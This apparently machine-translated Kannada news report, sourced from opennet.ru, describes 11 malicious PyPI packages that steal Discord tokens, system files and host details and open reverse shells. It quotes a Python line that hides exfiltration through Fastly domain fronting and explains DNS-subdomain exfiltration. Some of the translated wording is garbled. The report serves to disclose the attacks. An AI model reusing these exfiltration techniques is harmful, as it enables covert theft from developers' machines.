PyPI (Python Package Index) ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ, ದುರುದ್ದೇಶಪೂರಿತ ಕೋಡ್ ಹೊಂದಿರುವ 11 ಪ್ಯಾಕೇಜುಗಳನ್ನು ಗುರುತಿಸಲಾಗಿದೆ. ಸಮಸ್ಯೆಗಳನ್ನು ಗುರುತಿಸುವ ಮೊದಲು, ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ಒಟ್ಟು 38 ಸಾವಿರ ಬಾರಿ ಡೌನ್ಲೋಡ್ ಮಾಡಲಾಗಿದೆ. ಪತ್ತೆಯಾದ ದುರುದ್ದೇಶಪೂರಿತ ಪ್ಯಾಕೇಜ್ಗಳು ಆಕ್ರಮಣಕಾರರ ಸರ್ವರ್ಗಳೊಂದಿಗೆ ಸಂವಹನ ಚಾನಲ್ಗಳನ್ನು ಮರೆಮಾಡಲು ಅತ್ಯಾಧುನಿಕ ವಿಧಾನಗಳ ಬಳಕೆಗೆ ಗಮನಾರ್ಹವಾಗಿದೆ.
- ಪ್ರಮುಖ ಪ್ಯಾಕೇಜ್ (6305 ಡೌನ್ಲೋಡ್ಗಳು), ಪ್ರಮುಖ-ಪ್ಯಾಕೇಜ್ (12897) - ಸಿಸ್ಟಮ್ಗೆ (ರಿವರ್ಸ್ ಶೆಲ್) ಶೆಲ್ ಪ್ರವೇಶವನ್ನು ಒದಗಿಸಲು pypi.python.org ಗೆ ಸಂಪರ್ಕಿಸುವ ನೆಪದಲ್ಲಿ ಬಾಹ್ಯ ಸರ್ವರ್ಗೆ ಸಂಪರ್ಕವನ್ನು ಸ್ಥಾಪಿಸಲಾಗಿದೆ ಮತ್ತು ಮರೆಮಾಡಲು trevorc2 ಪ್ರೋಗ್ರಾಂ ಅನ್ನು ಬಳಸಲಾಗಿದೆ ಸಂವಹನ ಚಾನಲ್.
- pptest (10001), ipboards (946) - ಸಿಸ್ಟಮ್ ಬಗ್ಗೆ ಮಾಹಿತಿಯನ್ನು ರವಾನಿಸಲು DNS ಅನ್ನು ಸಂವಹನ ಚಾನಲ್ ಆಗಿ ಬಳಸಲಾಗುತ್ತದೆ (ಮೊದಲ ಪ್ಯಾಕೆಟ್ನಲ್ಲಿ ಹೋಸ್ಟ್ ಹೆಸರು, ಕಾರ್ಯನಿರ್ವಹಿಸುವ ಡೈರೆಕ್ಟರಿ, ಆಂತರಿಕ ಮತ್ತು ಬಾಹ್ಯ IP, ಎರಡನೆಯದರಲ್ಲಿ - ಬಳಕೆದಾರ ಹೆಸರು ಮತ್ತು ಹೋಸ್ಟ್ ಹೆಸರು) .
- owlmoon (3285), DiscordSafety (557), yiffparty (1859) - ವ್ಯವಸ್ಥೆಯಲ್ಲಿನ ಡಿಸ್ಕಾರ್ಡ್ ಸೇವಾ ಟೋಕನ್ ಅನ್ನು ಗುರುತಿಸಿ ಮತ್ತು ಅದನ್ನು ಬಾಹ್ಯ ಹೋಸ್ಟ್ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ.
- trrfab (287) - ಗುರುತಿಸುವಿಕೆ, ಹೋಸ್ಟ್ ಹೆಸರು ಮತ್ತು /etc/passwd, /etc/hosts, /home ನ ವಿಷಯಗಳನ್ನು ಬಾಹ್ಯ ಹೋಸ್ಟ್ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ.
- 10Cent10 (490) - ಬಾಹ್ಯ ಹೋಸ್ಟ್ನೊಂದಿಗೆ ರಿವರ್ಸ್ ಶೆಲ್ ಸಂಪರ್ಕವನ್ನು ಸ್ಥಾಪಿಸಲಾಗಿದೆ.
- yandex-yt (4183) - nda.ya.ru (api.ya.cc) ಮೂಲಕ ನೀಡಲಾದ ಮುಂದಿನ ಕ್ರಿಯೆಗಳ ಕುರಿತು ಹೆಚ್ಚುವರಿ ಮಾಹಿತಿಯೊಂದಿಗೆ ಸಿಸ್ಟಮ್ ರಾಜಿ ಮಾಡಿಕೊಳ್ಳುವ ಮತ್ತು ಮರುನಿರ್ದೇಶನಗೊಂಡಿರುವ ಬಗ್ಗೆ ಸಂದೇಶವನ್ನು ಪ್ರದರ್ಶಿಸುತ್ತದೆ.
ಪ್ರಮುಖ ಪ್ಯಾಕೇಜ್ ಮತ್ತು ಪ್ರಮುಖ-ಪ್ಯಾಕೇಜ್ ಪ್ಯಾಕೇಜ್ಗಳಲ್ಲಿ ಬಳಸಲಾದ ಬಾಹ್ಯ ಹೋಸ್ಟ್ಗಳನ್ನು ಪ್ರವೇಶಿಸುವ ವಿಧಾನವು ನಿರ್ದಿಷ್ಟವಾಗಿ ಗಮನಿಸಬೇಕಾದ ಸಂಗತಿಯಾಗಿದೆ, ಇದು ಅವರ ಚಟುವಟಿಕೆಯನ್ನು ಮರೆಮಾಡಲು PyPI ಡೈರೆಕ್ಟರಿಯಲ್ಲಿ ಬಳಸಲಾದ ಫಾಸ್ಟ್ಲಿ ಕಂಟೆಂಟ್ ಡೆಲಿವರಿ ನೆಟ್ವರ್ಕ್ ಅನ್ನು ಬಳಸಿದೆ. ವಾಸ್ತವವಾಗಿ, ವಿನಂತಿಗಳನ್ನು pypi.python.org ಸರ್ವರ್ಗೆ ಕಳುಹಿಸಲಾಗಿದೆ (HTTPS ವಿನಂತಿಯೊಳಗೆ SNI ನಲ್ಲಿ python.org ಹೆಸರನ್ನು ನಿರ್ದಿಷ್ಟಪಡಿಸುವುದು ಸೇರಿದಂತೆ), ಆದರೆ HTTP “ಹೋಸ್ಟ್” ಹೆಡರ್ ದಾಳಿಕೋರರಿಂದ ನಿಯಂತ್ರಿಸಲ್ಪಡುವ ಸರ್ವರ್ನ ಹೆಸರನ್ನು ಒಳಗೊಂಡಿದೆ (ಸೆಕೆ. forward.io. global.prod.fastly.net). ಡೇಟಾ ರವಾನೆ ಮಾಡುವಾಗ pypi.python.org ಗೆ TLS ಸಂಪರ್ಕದ ನಿಯತಾಂಕಗಳನ್ನು ಬಳಸಿಕೊಂಡು ವಿಷಯ ವಿತರಣಾ ನೆಟ್ವರ್ಕ್ ಆಕ್ರಮಣಕಾರಿ ಸರ್ವರ್ಗೆ ಇದೇ ರೀತಿಯ ವಿನಂತಿಯನ್ನು ಕಳುಹಿಸಿದೆ.
PyPI ಮೂಲಸೌಕರ್ಯವು ಫಾಸ್ಟ್ಲಿ ಕಂಟೆಂಟ್ ಡೆಲಿವರಿ ನೆಟ್ವರ್ಕ್ನಿಂದ ಚಾಲಿತವಾಗಿದೆ, ಇದು ವಿಶಿಷ್ಟವಾದ ವಿನಂತಿಗಳನ್ನು ಸಂಗ್ರಹಿಸಲು ವಾರ್ನಿಷ್ ಪಾರದರ್ಶಕ ಪ್ರಾಕ್ಸಿಯನ್ನು ಬಳಸುತ್ತದೆ ಮತ್ತು ಪ್ರಾಕ್ಸಿ ಮೂಲಕ HTTPS ವಿನಂತಿಗಳನ್ನು ಫಾರ್ವರ್ಡ್ ಮಾಡಲು ಅಂತಿಮ ಸರ್ವರ್ಗಳಿಗಿಂತ ಹೆಚ್ಚಾಗಿ CDN ಮಟ್ಟದಲ್ಲಿ TLS ಪ್ರಮಾಣಪತ್ರ ಸಂಸ್ಕರಣೆಯನ್ನು ಬಳಸುತ್ತದೆ. ಟಾರ್ಗೆಟ್ ಹೋಸ್ಟ್ನ ಹೊರತಾಗಿ, ವಿನಂತಿಗಳನ್ನು ಪ್ರಾಕ್ಸಿಗೆ ಕಳುಹಿಸಲಾಗುತ್ತದೆ, ಇದು HTTP "ಹೋಸ್ಟ್" ಹೆಡರ್ ಅನ್ನು ಬಳಸಿಕೊಂಡು ಬಯಸಿದ ಹೋಸ್ಟ್ ಅನ್ನು ನಿರ್ಧರಿಸುತ್ತದೆ ಮತ್ತು ಹೋಸ್ಟ್ ಡೊಮೇನ್ ಹೆಸರುಗಳನ್ನು CDN ಲೋಡ್ ಬ್ಯಾಲೆನ್ಸರ್ IP ವಿಳಾಸಗಳಿಗೆ ಜೋಡಿಸಲಾಗುತ್ತದೆ, ಅದು ಎಲ್ಲಾ ಫಾಸ್ಟ್ಲಿ ಕ್ಲೈಂಟ್ಗಳಿಗೆ ವಿಶಿಷ್ಟವಾಗಿದೆ.
ದಾಳಿಕೋರರ ಸರ್ವರ್ ಸಿಡಿಎನ್ ಫಾಸ್ಟ್ಲಿಯೊಂದಿಗೆ ನೋಂದಾಯಿಸುತ್ತದೆ, ಇದು ಎಲ್ಲರಿಗೂ ಉಚಿತ ಯೋಜನೆಗಳನ್ನು ಒದಗಿಸುತ್ತದೆ ಮತ್ತು ಅನಾಮಧೇಯ ನೋಂದಣಿಯನ್ನು ಸಹ ಅನುಮತಿಸುತ್ತದೆ. "ರಿವರ್ಸ್ ಶೆಲ್" ಅನ್ನು ರಚಿಸುವಾಗ ಬಲಿಪಶುಕ್ಕೆ ವಿನಂತಿಗಳನ್ನು ಕಳುಹಿಸಲು, ಒಂದು ಯೋಜನೆಯನ್ನು ಸಹ ಬಳಸಲಾಗುತ್ತದೆ, ಆದರೆ ಆಕ್ರಮಣಕಾರರ ಹೋಸ್ಟ್ನ ಕಡೆಯಿಂದ ಪ್ರಾರಂಭಿಸಲಾಗಿದೆ ಎಂಬುದು ಗಮನಾರ್ಹವಾಗಿದೆ. ಹೊರಗಿನಿಂದ, ಆಕ್ರಮಣಕಾರರ ಸರ್ವರ್ನೊಂದಿಗಿನ ಸಂವಾದವು PyPI ಡೈರೆಕ್ಟರಿಯೊಂದಿಗೆ ಕಾನೂನುಬದ್ಧ ಸೆಷನ್ನಂತೆ ಕಾಣುತ್ತದೆ, PyPI TLS ಪ್ರಮಾಣಪತ್ರವನ್ನು ಬಳಸಿಕೊಂಡು ಎನ್ಕ್ರಿಪ್ಟ್ ಮಾಡಲಾಗಿದೆ. "ಡೊಮೇನ್ ಫ್ರಂಟಿಂಗ್" ಎಂದು ಕರೆಯಲ್ಪಡುವ ಇದೇ ರೀತಿಯ ತಂತ್ರವನ್ನು ಹಿಂದೆ ನಿರ್ಬಂಧಿಸುವಿಕೆಯನ್ನು ಬೈಪಾಸ್ ಮಾಡುವಾಗ ಹೋಸ್ಟ್ ಹೆಸರನ್ನು ಮರೆಮಾಡಲು ಸಕ್ರಿಯವಾಗಿ ಬಳಸಲಾಗುತ್ತಿತ್ತು, SNI ನಲ್ಲಿ ಕಾಲ್ಪನಿಕ ಹೋಸ್ಟ್ ಅನ್ನು ಸೂಚಿಸುವ ಮೂಲಕ HTTPS ಅನ್ನು ಪ್ರವೇಶಿಸಲು ಕೆಲವು CDN ನೆಟ್ವರ್ಕ್ಗಳಲ್ಲಿ ಒದಗಿಸಲಾದ ಸಾಮರ್ಥ್ಯವನ್ನು ಬಳಸಿ ಮತ್ತು ವಾಸ್ತವವಾಗಿ ಹೆಸರನ್ನು ರವಾನಿಸುತ್ತದೆ. TLS ಸೆಶನ್ನಲ್ಲಿ HTTP ಹೋಸ್ಟ್ ಹೆಡರ್ನಲ್ಲಿ ಹೋಸ್ಟ್ ಅನ್ನು ವಿನಂತಿಸಲಾಗಿದೆ.
ದುರುದ್ದೇಶಪೂರಿತ ಚಟುವಟಿಕೆಯನ್ನು ಮರೆಮಾಡಲು, ಸಾಮಾನ್ಯ ವೆಬ್ ನ್ಯಾವಿಗೇಷನ್ಗೆ ಹೋಲುವ ಸರ್ವರ್ನೊಂದಿಗೆ ಸಂವಹನ ನಡೆಸಲು TrevorC2 ಪ್ಯಾಕೇಜ್ ಅನ್ನು ಹೆಚ್ಚುವರಿಯಾಗಿ ಬಳಸಲಾಗುತ್ತದೆ, ಉದಾಹರಣೆಗೆ, "https://pypi.python.org/images/ ಚಿತ್ರವನ್ನು ಡೌನ್ಲೋಡ್ ಮಾಡುವ ನೆಪದಲ್ಲಿ ದುರುದ್ದೇಶಪೂರಿತ ವಿನಂತಿಗಳನ್ನು ಕಳುಹಿಸಲಾಗಿದೆ. ಮಾರ್ಗದರ್ಶಿ ಪ್ಯಾರಾಮೀಟರ್ನಲ್ಲಿ ಮಾಹಿತಿ ಎನ್ಕೋಡಿಂಗ್ನೊಂದಿಗೆ guid=”. url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload r = request.Request(url, headers = {'Host': "psec.forward.io.global.prod.fastly.net"})
Pptest ಮತ್ತು ipboards ಪ್ಯಾಕೇಜುಗಳು DNS ಸರ್ವರ್ಗೆ ಪ್ರಶ್ನೆಗಳಲ್ಲಿ ಉಪಯುಕ್ತ ಮಾಹಿತಿಯನ್ನು ಎನ್ಕೋಡಿಂಗ್ ಮಾಡುವ ಆಧಾರದ ಮೇಲೆ ನೆಟ್ವರ್ಕ್ ಚಟುವಟಿಕೆಯನ್ನು ಮರೆಮಾಡಲು ವಿಭಿನ್ನ ವಿಧಾನವನ್ನು ಬಳಸುತ್ತವೆ. "nu4timjagq4fimbuhe.example.com" ನಂತಹ DNS ವಿನಂತಿಗಳನ್ನು ನಿರ್ವಹಿಸುವ ಮೂಲಕ ಮಾಲ್ವೇರ್ ಮಾಹಿತಿಯನ್ನು ರವಾನಿಸುತ್ತದೆ, ಇದರಲ್ಲಿ ನಿಯಂತ್ರಣ ಸರ್ವರ್ಗೆ ರವಾನೆಯಾಗುವ ಡೇಟಾವನ್ನು ಸಬ್ಡೊಮೈನ್ ಹೆಸರಿನಲ್ಲಿ ಬೇಸ್64 ಫಾರ್ಮ್ಯಾಟ್ ಬಳಸಿ ಎನ್ಕೋಡ್ ಮಾಡಲಾಗುತ್ತದೆ. ಉದಾಹರಣೆಗೆ.com ಡೊಮೇನ್ಗಾಗಿ DNS ಸರ್ವರ್ ಅನ್ನು ನಿಯಂತ್ರಿಸುವ ಮೂಲಕ ಆಕ್ರಮಣಕಾರರು ಈ ಸಂದೇಶಗಳನ್ನು ಸ್ವೀಕರಿಸುತ್ತಾರೆ.
ಮೂಲ: opennet.ru